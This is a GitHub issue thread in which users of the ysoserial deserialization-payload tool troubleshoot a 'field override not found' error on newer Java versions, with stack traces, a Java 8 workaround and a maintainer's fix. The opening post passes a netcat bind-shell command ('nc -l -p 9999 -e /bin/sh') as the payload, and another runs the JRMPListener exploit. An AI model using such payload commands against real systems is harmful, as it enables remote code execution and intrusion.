Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Error while generating or serializing payload #136

Closed
DoMINAToR98 opened this issue Nov 30, 2019 · 7 comments
Closed

Error while generating or serializing payload #136

DoMINAToR98 opened this issue Nov 30, 2019 · 7 comments

Comments

@DoMINAToR98
Copy link

OS: macOS High Sierra Version 10.13.6
$ java -jar ysoserial-master-30099844c6-1.jar Spring1 "/usr/bin/nc -l -p 9999 -e /bin/sh" 70 ↵
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by ysoserial.payloads.util.Gadgets (file:/Users/~/Desktop/ysoserial-master-30099844c6-1.jar) to constructor com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl()
WARNING: Please consider reporting this to the maintainers of ysoserial.payloads.util.Gadgets
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
Error while generating or serializing payload
com.nqzero.permit.Permit$InitializationFailed: initialization failed, perhaps you're running with a security manager
at com.nqzero.permit.Permit.setAccessible(Permit.java:22)
at ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:17)
at ysoserial.payloads.util.Reflections.getField(Reflections.java:24)
at ysoserial.payloads.util.Reflections.setFieldValue(Reflections.java:34)
at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:129)
at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102)
at ysoserial.payloads.Spring1.getObject(Spring1.java:57)
at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
Caused by: com.nqzero.permit.Permit$FieldNotFound: field "override" not found
at com.nqzero.permit.Permit.(Permit.java:222)
at com.nqzero.permit.Permit.build(Permit.java:117)
at com.nqzero.permit.Permit.(Permit.java:16)
... 7 more

Trying the same command on some Linux Distro worked for me, any solutions for this on macOSX?
@neubauek
Copy link

neubauek commented Dec 7, 2019

Same here on Catalina.

java -jar ysoserial.jar CommonsCollections1 'calc.exe'
Error while generating or serializing payload
com.nqzero.permit.Permit$InitializationFailed: initialization failed, perhaps you're running with a security manager
at com.nqzero.permit.Permit.setAccessible(Permit.java:22)
at ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:17)
at ysoserial.payloads.util.Reflections.getFirstCtor(Reflections.java:45)
at ysoserial.payloads.util.Gadgets.createMemoizedInvocationHandler(Gadgets.java:72)
at ysoserial.payloads.util.Gadgets.createMemoitizedProxy(Gadgets.java:67)
at ysoserial.payloads.CommonsCollections1.getObject(CommonsCollections1.java:71)
at ysoserial.payloads.CommonsCollections1.getObject(CommonsCollections1.java:43)
at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
Caused by: com.nqzero.permit.Permit$FieldNotFound: field "override" not found
at com.nqzero.permit.Permit.(Permit.java:222)
at com.nqzero.permit.Permit.build(Permit.java:117)
at com.nqzero.permit.Permit.(Permit.java:16)
... 7 more

@XhstormR
Copy link

Same here on Windwos.

D:\Download>java --version
java 13.0.1 2019-10-15
Java(TM) SE Runtime Environment (build 13.0.1+9)
Java HotSpot(TM) 64-Bit Server VM (build 13.0.1+9, mixed mode, sharing)

D:\Download>java -jar ysoserial-master-30099844c6-1.jar Groovy1 calc.exe
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by org.codehaus.groovy.reflection.CachedClass$3$1 (file:/D:/Download/ysoserial-master-30099844c6-1.jar) to method java.lang.Object.finalize()
WARNING: Please consider reporting this to the maintainers of org.codehaus.groovy.reflection.CachedClass$3$1
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
Error while generating or serializing payload
com.nqzero.permit.Permit$InitializationFailed: initialization failed, perhaps you're running with a security manager
        at com.nqzero.permit.Permit.setAccessible(Permit.java:22)
        at ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:17)
        at ysoserial.payloads.util.Reflections.getFirstCtor(Reflections.java:45)
        at ysoserial.payloads.util.Gadgets.createMemoizedInvocationHandler(Gadgets.java:72)
        at ysoserial.payloads.Groovy1.getObject(Groovy1.java:39)
        at ysoserial.payloads.Groovy1.getObject(Groovy1.java:29)
        at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
Caused by: com.nqzero.permit.Permit$FieldNotFound: field "override" not found
        at com.nqzero.permit.Permit.<init>(Permit.java:222)
        at com.nqzero.permit.Permit.build(Permit.java:117)
        at com.nqzero.permit.Permit.<clinit>(Permit.java:16)
        ... 6 more

@bestlzk
Copy link

bestlzk commented Feb 5, 2020

I have the same problem when I use jdk13, and I solve this problem by using jdk8.

@engn33r engn33r mentioned this issue May 6, 2020
Closed
@RiRa12621
Copy link

RiRa12621 commented Oct 5, 2020
edited
Loading

you can mitigate this by specifically using java 8
/Library/Java/JavaVirtualMachines/adoptopenjdk-8.jdk/Contents/Home/bin/java -jar on MacOS
assuming you have Java 8 installed as an option

you can find that out like

$ /usr/libexec/java_home -V
Matching Java Virtual Machines (3):
    15, x86_64: "AdoptOpenJDK 15"       /Library/Java/JavaVirtualMachines/adoptopenjdk-15.jdk/Contents/Home
    14.0.1, x86_64:     "OpenJDK 14.0.1"        /Library/Java/JavaVirtualMachines/openjdk.jdk/Contents/Home
    1.8.0_265, x86_64:  "AdoptOpenJDK 8"        /Library/Java/JavaVirtualMachines/adoptopenjdk-8.jdk/Contents/Home

/Library/Java/JavaVirtualMachines/adoptopenjdk-15.jdk/Contents/Home

@wh1tenoise
Copy link 

PS C:\Malware> java -version
java version "15.0.1" 2020-10-20
Java(TM) SE Runtime Environment (build 15.0.1+9-18)
Java HotSpot(TM) 64-Bit Server VM (build 15.0.1+9-18, mixed mode, sharing)

PS C:\Malware> java -cp .\ysoserial-master-6eca5bc740-1.jar ysoserial.exploit.JRMPListener 4444 CommonsCollections5 'nslookup google.com'
Exception in thread "main" java.lang.IllegalArgumentException: Failed to construct payload
        at ysoserial.payloads.ObjectPayload$Utils.makePayloadObject(ObjectPayload.java:72)
        at ysoserial.exploit.JRMPListener.main(JRMPListener.java:113)
Caused by: com.nqzero.permit.Permit$InitializationFailed: initialization failed, perhaps you're running with a security manager
        at com.nqzero.permit.Permit.setAccessible(Permit.java:22)
        at ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:17)
        at ysoserial.payloads.CommonsCollections5.getObject(CommonsCollections5.java:83)
        at ysoserial.payloads.CommonsCollections5.getObject(CommonsCollections5.java:51)
        at ysoserial.payloads.ObjectPayload$Utils.makePayloadObject(ObjectPayload.java:69)
        ... 1 more
Caused by: com.nqzero.permit.Permit$FieldNotFound: field "override" not found
        at com.nqzero.permit.Permit.<init>(Permit.java:222)
        at com.nqzero.permit.Permit.build(Permit.java:117)
        at com.nqzero.permit.Permit.<clinit>(Permit.java:16)
        ... 5 more

This problem seems to persist. Will this be fixed or is Java8 the way to go?

@Alexandre-Bartel
Copy link
Contributor

Java >=12 does not allow access to private fields of certain sensitive classes (which Permit tries to do). Note that there is not portable Java trick anymore to access these fields. See https://bugs.openjdk.java.net/browse/JDK-8210522 for details.
A fix is in PR #149

@frohoff
Copy link
Owner

frohoff commented Apr 23, 2022

Closed by #149

@frohoff frohoff closed this as completed Apr 23, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
8 participants
@frohoff @neubauek @Alexandre-Bartel @XhstormR @RiRa12621 @DoMINAToR98 @bestlzk @wh1tenoise